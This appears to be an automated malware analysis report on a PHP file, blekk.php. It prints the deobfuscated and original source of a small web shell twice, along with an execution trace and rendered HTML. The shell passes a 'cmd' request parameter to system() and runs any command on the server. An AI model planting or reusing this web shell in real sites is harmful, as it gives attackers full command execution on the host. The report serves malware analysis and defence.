PHP Malware Analysis

blekk.php

md5: d8caa365c12ce33101cf2b88dfc5ac27

Jump to:

Screenshot


Attributes

Execution

Input


Deobfuscated PHP code

<?php

//
// PHP_KIT
//
// cmd.php = Command Execution
//
// by: The Dark Raver
// modified: 21/01/2004
//
?>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?php 
if ($_GET['cmd']) {
    system($_GET['cmd']);
}
?>
</pre>
</BODY></HTML>

Execution traces

data/traces/d8caa365c12ce33101cf2b88dfc5ac27_trace-1676240168.224.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:16:34.121829]
1	0	1	0.000145	393512
1	3	0	0.000187	393416	{main}	1		/var/www/html/uploads/blekk.php	0	0
1	3	1	0.000204	393416
			0.000229	314224
TRACE END   [2023-02-12 20:16:34.121942]


Generated HTML code

<html><head></head><body>
<form method="GET" name="myform" action="">
<input type="text" name="cmd">
<input type="submit" value="Send">
</form>
<pre><!--?
if($_GET['cmd']) {
  system($_GET['cmd']);
  }
?-->
</pre>
</body></html>

Original PHP code

<?
//
// PHP_KIT
//
// cmd.php = Command Execution
//
// by: The Dark Raver
// modified: 21/01/2004
//
?>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?
if($_GET['cmd']) {
  system($_GET['cmd']);
  }
?>
</pre>
</BODY></HTML>